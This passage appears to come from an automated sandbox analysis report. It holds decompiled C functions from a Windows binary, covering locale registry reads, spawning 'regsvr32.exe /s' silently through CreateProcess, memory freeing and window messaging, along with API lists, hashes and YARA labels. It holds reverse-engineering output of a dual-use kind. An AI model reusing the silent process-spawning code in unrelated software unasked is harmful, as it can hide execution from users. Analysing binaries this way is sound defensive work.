                                                                    • RegCloseKey.ADVAPI32(00000001,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,005C80EE), ref: 005C806E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AddressCloseHandleModuleProc
                                                                    • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                    • API String ID: 4190037839-2401316094
                                                                    • Opcode ID: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                                    • Instruction ID: b59d3067a1cffae51886ca0dc1f1740e66d40653876fb7099798d5cffc045aa9
                                                                    • Opcode Fuzzy Hash: 9ecea8ea030eead22ebc029c49188dd1b7d15adc30014d18dbe4d38bf6596737
                                                                    • Instruction Fuzzy Hash: 51214F34A04209AFDB10EAE5CC5AFFE7BE9FB48704F60486DA500F3681EE74AA45C755
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00624BA8, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 71%
                                                                    			E00624BA8(char __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v13;
				char _v84;
				void* _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				void* _t58;
				void* _t91;
				char _t92;
				intOrPtr _t110;
				void* _t120;
				void* _t123;

				_t118 = __edi;
				_v116 = 0;
				_v120 = 0;
				_v112 = 0;
				_v108 = 0;
				_v104 = 0;
				_v8 = 0;
				_v12 = 0;
				_t120 = __ecx;
				_t91 = __edx;
				_v13 = __eax;
				_push(_t123);
				_push(0x624d3e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t123 + 0xffffff84;
				E005C745C( &_v8);
				_push(0x624d58);
				E005C4EA4(_v8,  &_v104);
				_push(_v104);
				_push(L"regsvr32.exe\"");
				E0040B550( &_v12, _t91, 3, __edi, _t120);
				if(_v13 != 0) {
					E0040B470( &_v12, 0x624d90);
				}
				_push(_v12);
				_push(L" /s \"");
				_push(_t120);
				_push(0x624d58);
				E0040B550( &_v12, _t91, 4, _t118, _t120);
				_t126 = _t91;
				if(_t91 == 0) {
					E0040B4C8( &_v112, _v12, L"Spawning 32-bit RegSvr32: ");
					E00616130(_v112, _t91, _t118, _t120);
				} else {
					E0040B4C8( &_v108, _v12, L"Spawning 64-bit RegSvr32: ");
					E00616130(_v108, _t91, _t118, _t120);
				}
				E00407760( &_v84, 0x44);
				_v84 = 0x44;
				_t58 = E0040B278(_v8);
				if(E0060C038(_t91, E0040B278(_v12), 0, _t126,  &_v100,  &_v84, _t58, 0, 0x4000000, 0, 0, 0) == 0) {
					E0060CE84(L"CreateProcess");
				}
				CloseHandle(_v96);
				_t92 = E00624AA4( &_v100);
				if(_t92 != 0) {
					_v128 = _t92;
					_v124 = 0;
					E004244F8(L"0x%x", 0,  &_v128,  &_v120);
					E005CD508(0x53,  &_v116, _v120);
					E00429008(_v116, 1);
					E004098C4();
				}
				_pop(_t110);
				 *[fs:eax] = _t110;
				_push(E00624D45);
				E0040A228( &_v120, 5);
				return E0040A228( &_v12, 2);
			}






















                                                                    0x00624ba8
                                                                    0x00624bb2
                                                                    0x00624bb5
                                                                    0x00624bb8
                                                                    0x00624bbb
                                                                    0x00624bbe
                                                                    0x00624bc1
                                                                    0x00624bc4
                                                                    0x00624bc7
                                                                    0x00624bc9
                                                                    0x00624bcb
                                                                    0x00624bd0
                                                                    0x00624bd1
                                                                    0x00624bd6
                                                                    0x00624bd9
                                                                    0x00624bdf
                                                                    0x00624be4
                                                                    0x00624bef
                                                                    0x00624bf4
                                                                    0x00624bf7
                                                                    0x00624c04
                                                                    0x00624c0d
                                                                    0x00624c17
                                                                    0x00624c17
                                                                    0x00624c1c
                                                                    0x00624c1f
                                                                    0x00624c24
                                                                    0x00624c25
                                                                    0x00624c32
                                                                    0x00624c37
                                                                    0x00624c39
                                                                    0x00624c60
                                                                    0x00624c68
                                                                    0x00624c3b
                                                                    0x00624c46
                                                                    0x00624c4e
                                                                    0x00624c4e
                                                                    0x00624c77
                                                                    0x00624c7c
                                                                    0x00624c93
                                                                    0x00624cb6
                                                                    0x00624cbd
                                                                    0x00624cbd
                                                                    0x00624cc6
                                                                    0x00624cd3
                                                                    0x00624cd7
                                                                    0x00624cdd
                                                                    0x00624ce0
                                                                    0x00624cee
                                                                    0x00624cfd
                                                                    0x00624d0c
                                                                    0x00624d11
                                                                    0x00624d11
                                                                    0x00624d18
                                                                    0x00624d1b
                                                                    0x00624d1e
                                                                    0x00624d2b
                                                                    0x00624d3d

                                                                    APIs
                                                                      • Part of subcall function 005C745C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C746F
                                                                    • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00624D58,00000000, /s ",006D579C,regsvr32.exe",?,00624D58), ref: 00624CC6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseDirectoryHandleSystem
                                                                    • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                    • API String ID: 2051275411-1862435767
                                                                    • Opcode ID: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                    • Instruction ID: 4609d961d1e6a6c9b50d20a9c17260b7e2f4bf46ee5c2bafd069b1c5a14d41a0
                                                                    • Opcode Fuzzy Hash: 1bea974fa6696359a357cec99c828a5227b29a5a15a1c42e55022760e2430c78
                                                                    • Instruction Fuzzy Hash: 0B413F30A0061CABDB10EFE5D892ACDBBBAFF48304F51457EA504B7282DB746A05CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004062CC, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 51fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E004062CC(int __eax, void* __ecx, void* __edx) {
				long _v12;
				int _t4;
				long _t7;
				void* _t11;
				long _t12;
				void* _t13;
				long _t18;

				_t4 = __eax;
				_t24 = __edx;
				_t20 = __eax;
				if( *0x6cf05c == 0) {
					_push(0x2010);
					_push(__edx);
					_push(__eax);
					_push(0);
					L0040529C();
				} else {
					_t7 = E0040A6C4(__edx);
					WriteFile(GetStdHandle(0xfffffff4), _t24, _t7,  &_v12, 0);
					_t11 =  *0x6c507c; // 0x40543c
					_t12 = E0040A6C4(_t11);
					_t13 =  *0x6c507c; // 0x40543c
					WriteFile(GetStdHandle(0xfffffff4), _t13, _t12,  &_v12, 0);
					_t18 = E0040A6C4(_t20);
					_t4 = WriteFile(GetStdHandle(0xfffffff4), _t20, _t18,  &_v12, 0);
				}
				return _t4;
			}










                                                                    0x004062cc
                                                                    0x004062cf
                                                                    0x004062d1
                                                                    0x004062da
                                                                    0x0040633d
                                                                    0x00406342
                                                                    0x00406343
                                                                    0x00406344
                                                                    0x00406346
                                                                    0x004062dc
                                                                    0x004062e5
                                                                    0x004062f4
                                                                    0x00406300
                                                                    0x00406305
                                                                    0x0040630b
                                                                    0x00406319
                                                                    0x00406327
                                                                    0x00406336
                                                                    0x00406336
                                                                    0x0040634e

                                                                    APIs
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 004062EE
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000), ref: 004062F4
                                                                    • GetStdHandle.KERNEL32(000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406313
                                                                    • WriteFile.KERNEL32(00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?,00000000), ref: 00406319
                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000,?), ref: 00406330
                                                                    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,0040543C,00000000,?,00000000,00000000,000000F4,?,00000000), ref: 00406336
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileHandleWrite
                                                                    • String ID: <T@
                                                                    • API String ID: 3320372497-2050694182
                                                                    • Opcode ID: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                    • Instruction ID: ee5667e1a227ecbea5375e2fa2ea65b47cf69c4a4a195d8f09788a9c4629ec5a
                                                                    • Opcode Fuzzy Hash: 3a7656cd0c19575780d7894bf4f285e5ac945aaff44c80ad8d028cd78a591cb3
                                                                    • Instruction Fuzzy Hash: 5701A9A16046147DE610F3BA9C4AF6B279CCB0976CF10463B7514F61D2C97C9C548B7E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405D88, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 91%
                                                                    			E00405D88(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
				signed int _t113;
				void* _t115;
				void* _t116;

				_t56 = __eax;
				_t89 =  *(__eax - 4);
				_t78 =  *0x6cf05d; // 0x0
				if((_t89 & 0x00000007) != 0) {
					__eflags = _t89 & 0x00000005;
					if((_t89 & 0x00000005) != 0) {
						_pop(_t78);
						__eflags = _t89 & 0x00000003;
						if((_t89 & 0x00000003) == 0) {
							_push(_t78);
							_push(__edi);
							_t116 = _t115 + 0xffffffdc;
							_t103 = __eax - 0x10;
							E00405764();
							_t58 = _t103;
							 *_t116 =  *_t58;
							_v48 =  *((intOrPtr*)(_t58 + 4));
							_t92 =  *(_t58 + 0xc);
							if((_t92 & 0x00000008) != 0) {
								_t79 = _t103;
								_t113 = _t92 & 0xfffffff0;
								_t99 = 0;
								__eflags = 0;
								while(1) {
									VirtualQuery(_t79,  &_v44, 0x1c);
									_t61 = VirtualFree(_t79, 0, 0x8000);
									__eflags = _t61;
									if(_t61 == 0) {
										_t99 = _t99 | 0xffffffff;
										goto L10;
									}
									_t104 = _v44.RegionSize;
									__eflags = _t113 - _t104;
									if(_t113 > _t104) {
										_t113 = _t113 - _t104;
										_t79 = _t79 + _t104;
										continue;
									}
									goto L10;
								}
							} else {
								if(VirtualFree(_t103, 0, 0x8000) == 0) {
									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								 *_v48 =  *_t116;
								 *( *_t116 + 4) = _v48;
							}
							 *0x6d1b7c = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx =  *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags =  *0x6cf98d;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					 *_t14 =  *(__edx + 0x14) - 1;
					__eflags =  *_t14;
					__eax =  *(__edx + 0x10);
					if( *_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							 *(__ebx + 0x14) = __eax;
						} else {
							__eax =  *(__edx + 0xc);
							__ecx =  *(__edx + 8);
							 *(__eax + 8) = __ecx;
							 *(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						 *__ebx = __al;
						__eax = __edx;
						__edx =  *(__edx - 4);
						__bl =  *0x6cf05d; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x6cfaec], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags =  *0x6cf98d;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x6cfaec], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004055DC(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags =  *(_t106 - 4) & 0x00000008;
						if(( *(_t106 - 4) & 0x00000008) != 0) {
							_t88 =  *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E004055DC(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags =  *0x6cfaf4 - 0x13ffe0;
							if( *0x6cfaf4 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E0040567C(_t67);
								 *((intOrPtr*)(_t82 - 4)) = 2;
								 *0x6cfaf4 = 0x13ffe0;
								 *0x6cfaf0 = _t82;
								 *0x6cfaec = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 =  *_t108;
								_t96 =  *(_t108 + 4);
								 *(_t70 + 4) = _t96;
								 *_t96 = _t70;
								 *0x6cfaec = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							 *(_t106 - 4) = _t81 + 3;
							 *(_t106 - 8 + _t81) = _t81;
							E0040561C(_t106, _t88, _t81);
							 *0x6cfaec = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						 *(__edx + 0x10) = __ecx;
						 *(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx =  *(__ebx + 8);
							 *(__edx + 0xc) = __ebx;
							 *(__edx + 8) = __ecx;
							 *(__ecx + 0xc) = __edx;
							 *(__ebx + 8) = __edx;
							 *__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							 *__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}




























                                                                    0x00405d88
                                                                    0x00405d88
                                                                    0x00405d91
                                                                    0x00405d97
                                                                    0x00405e80
                                                                    0x00405e83
                                                                    0x00405f70
                                                                    0x00405f71
                                                                    0x00405f74
                                                                    0x00405814
                                                                    0x00405816
                                                                    0x00405818
                                                                    0x0040581d
                                                                    0x00405820
                                                                    0x00405825
                                                                    0x00405829
                                                                    0x0040582f
                                                                    0x00405833
                                                                    0x00405839
                                                                    0x00405855
                                                                    0x00405859
                                                                    0x0040585c
                                                                    0x0040585c
                                                                    0x0040585e
                                                                    0x00405866
                                                                    0x00405873
                                                                    0x00405878
                                                                    0x0040587a
                                                                    0x0040587c
                                                                    0x0040587f
                                                                    0x0040587f
                                                                    0x00405881
                                                                    0x00405885
                                                                    0x00405887
                                                                    0x00405889
                                                                    0x0040588b
                                                                    0x00000000
                                                                    0x0040588b
                                                                    0x00000000
                                                                    0x00405887
                                                                    0x0040583b
                                                                    0x0040584a
                                                                    0x00405850
                                                                    0x0040584c
                                                                    0x0040584c
                                                                    0x0040584c
                                                                    0x0040584a
                                                                    0x0040588f
                                                                    0x00405891
                                                                    0x0040589a
                                                                    0x004058a3
                                                                    0x004058a3
                                                                    0x004058a6
                                                                    0x004058b6
                                                                    0x00405f7a
                                                                    0x00405f7f
                                                                    0x00405f7f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405d9d
                                                                    0x00405d9d
                                                                    0x00405d9f
                                                                    0x00405da1
                                                                    0x00405e04
                                                                    0x00405e04
                                                                    0x00405e09
                                                                    0x00405e0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e0f
                                                                    0x00405e11
                                                                    0x00405e18
                                                                    0x00000000
                                                                    0x00405e1a
                                                                    0x00405e1e
                                                                    0x00405e23
                                                                    0x00405e24
                                                                    0x00405e25
                                                                    0x00405e2a
                                                                    0x00405e2e
                                                                    0x00405e38
                                                                    0x00405e3d
                                                                    0x00405e3e
                                                                    0x00000000
                                                                    0x00405e3e
                                                                    0x00405e2e
                                                                    0x00000000
                                                                    0x00405e18
                                                                    0x00405e04
                                                                    0x00405da3
                                                                    0x00405da3
                                                                    0x00405da3
                                                                    0x00405da3
                                                                    0x00405da7
                                                                    0x00405daa
                                                                    0x00405dd8
                                                                    0x00405dda
                                                                    0x00405def
                                                                    0x00405def
                                                                    0x00405ddc
                                                                    0x00405ddc
                                                                    0x00405ddf
                                                                    0x00405de2
                                                                    0x00405de5
                                                                    0x00405de8
                                                                    0x00405dea
                                                                    0x00405ded
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405ded
                                                                    0x00405df2
                                                                    0x00405df4
                                                                    0x00405df6
                                                                    0x00405df9
                                                                    0x00405e89
                                                                    0x00405e8c
                                                                    0x00405e8e
                                                                    0x00405e90
                                                                    0x00405e91
                                                                    0x00405e93
                                                                    0x00405e44
                                                                    0x00405e44
                                                                    0x00405e49
                                                                    0x00405e51
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00405e53
                                                                    0x00405e55
                                                                    0x00405e5c
                                                                    0x00000000
                                                                    0x00405e5e
                                                                    0x00405e60
                                                                    0x00405e65
                                                                    0x00405e6a
                                                                    0x00405e72
                                                                    0x00405e76
                                                                    0x00000000
                                                                    0x00405e76
                                                                    0x00405e72
                                                                    0x00000000
                                                                    0x00405e5c
                                                                    0x00405e44
                                                                    0x00405e95
                                                                    0x00405e95
                                                                    0x00405e9d
                                                                    0x00405ea1
                                                                    0x00405ed8
                                                                    0x00405edb
                                                                    0x00405ede
                                                                    0x00405ee0
                                                                    0x00405ee6
                                                                    0x00405ee8
                                                                    0x00405ee8
                                                                    0x00405ea3
                                                                    0x00405ea3
                                                                    0x00405ea3
                                                                    0x00405ea6
                                                                    0x00405ea6
                                                                    0x00405eaa
                                                                    0x00405eae
                                                                    0x00405ef0
                                                                    0x00405ef3
                                                                    0x00405ef5
                                                                    0x00405ef7
                                                                    0x00405efd
                                                                    0x00405f01
                                                                    0x00405f01
                                                                    0x00405efd
                                                                    0x00405eb0
                                                                    0x00405eb6
                                                                    0x00405f08
                                                                    0x00405f12
                                                                    0x00405f40
                                                                    0x00405f46
                                                                    0x00405f4b
                                                                    0x00405f52
                                                                    0x00405f5c
                                                                    0x00405f62
                                                                    0x00405f69
                                                                    0x00405f6d
                                                                    0x00405f14
                                                                    0x00405f14
                                                                    0x00405f17
                                                                    0x00405f19
                                                                    0x00405f1c
                                                                    0x00405f1f
                                                                    0x00405f21
                                                                    0x00405f30
                                                                    0x00405f35
                                                                    0x00405f38
                                                                    0x00405f3c
                                                                    0x00405f3c
                                                                    0x00405eb8
                                                                    0x00405ebb
                                                                    0x00405ebe
                                                                    0x00405ec6
                                                                    0x00405ecb
                                                                    0x00405ed2
                                                                    0x00405ed6
                                                                    0x00405ed6
                                                                    0x00405dac
                                                                    0x00405dac
                                                                    0x00405dae
                                                                    0x00405db4
                                                                    0x00405db7
                                                                    0x00405dc0
                                                                    0x00405dc3
                                                                    0x00405dc6
                                                                    0x00405dc9
                                                                    0x00405dcc
                                                                    0x00405dcf
                                                                    0x00405dd2
                                                                    0x00405dd2
                                                                    0x00405dd4
                                                                    0x00405dd5
                                                                    0x00405db9
                                                                    0x00405db9
                                                                    0x00405db9
                                                                    0x00405dbb
                                                                    0x00405dbd
                                                                    0x00405dbe
                                                                    0x00405dbe
                                                                    0x00405db7
                                                                    0x00405daa

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A,00000000), ref: 00405E1E
                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040F300,0040F366,?,00000000,?,?,0040F689,00000000,?,00000000,0040FB8A), ref: 00405E38
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.315796627.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000B.00000002.315791880.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316640790.00000000006C5000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316649990.00000000006C6000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316666432.00000000006C7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316674259.00000000006CA000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316683886.00000000006CC000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316690706.00000000006CE000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316699391.00000000006CF000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316705523.00000000006D4000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316717138.00000000006D9000.00000008.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316728972.00000000006DB000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316734256.00000000006DC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000B.00000002.316743799.00000000006DE000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: Sleep
                                                                    • String ID:
                                                                    • API String ID: 3472027048-0
                                                                    • Opcode ID: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                    • Instruction ID: 71ad01a6e0dc675f4130d8d0918bf11407b14d9ec69c5e02b41b8aae26145368
                                                                    • Opcode Fuzzy Hash: d1f42db9d12138cdecdca87d68e48a81541cc59cd0f269c0ee0c41ffaf02f020
                                                                    • Instruction Fuzzy Hash: 2871C031604A008FD715DB69C989B27BBD5EF85314F18C17FE888AB3D2D6B88941CF99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 005B8390, Relevance: 12.1, APIs: 8, Instructions: 99windowthreadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E005B8390(void* __eax, struct HWND__** __edx) {
				long _v20;
				intOrPtr _t17;
				intOrPtr _t30;
				void* _t46;
				void* _t50;
				struct HWND__** _t51;
				struct HWND__* _t52;
				struct HWND__* _t53;
				void* _t54;
				DWORD* _t55;

				_t55 = _t54 + 0xfffffff8;
				_t51 = __edx;
				_t50 = __eax;
				_t46 = 0;
				_t17 =  *((intOrPtr*)(__edx + 4));
				if(_t17 < 0x100 || _t17 > 0x109) {
					L19:
					return _t46;
				} else {
					_t52 = GetCapture();
					if(_t52 != 0) {
						GetWindowThreadProcessId(_t52, _t55);
						GetWindowThreadProcessId( *(_t50 + 0x188),  &_v20);
						if( *_t55 == _v20 && SendMessageW(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
							_t46 = 1;
						}
						goto L19;
					}
					_t53 =  *_t51;
					_t30 =  *((intOrPtr*)(_t50 + 0x58));
					if(_t30 == 0 || _t53 !=  *((intOrPtr*)(_t30 + 0x3c4))) {
						L7:
						if(E0050E9B4(_t53) == 0 && _t53 != 0) {
							_t53 = GetParent(_t53);
							goto L7;
						}
						if(_t53 == 0) {
							_t53 =  *_t51;
						}
						goto L11;
					} else {
						_t53 = E0051B414(_t30);
						L11:
						if(IsWindowUnicode(_t53) == 0) {
							if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
								_t46 = 1;
							}
						} else {
							if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
								_t46 = 1;
							}
						}
						goto L19;
					}
				}
			}













                                                                    0x005b8394
                                                                    0x005b8397
                                                                    0x005b8399
                                                                    0x005b839b
                                                                    0x005b839d
                                                                    0x005b83a5
                                                                    0x005b847e
                                                                    0x005b8486
                                                                    0x005b83b6
                                                                    0x005b83bb
                                                                    0x005b83bf
                                                                    0x005b8442
                                                                    0x005b8453
                                                                    0x005b845f
                                                                    0x005b847c
                                                                    0x005b847c
                                                                    0x00000000
                                                                    0x005b845f
                                                                    0x005b83c1
                                                                    0x005b83c3
                                                                    0x005b83c8
                                                                    0x005b83e3
                                                                    0x005b83ec
                                                                    0x005b83e1
                                                                    0x00000000
                                                                    0x005b83e1
                                                                    0x005b83f4
                                                                    0x005b83f6
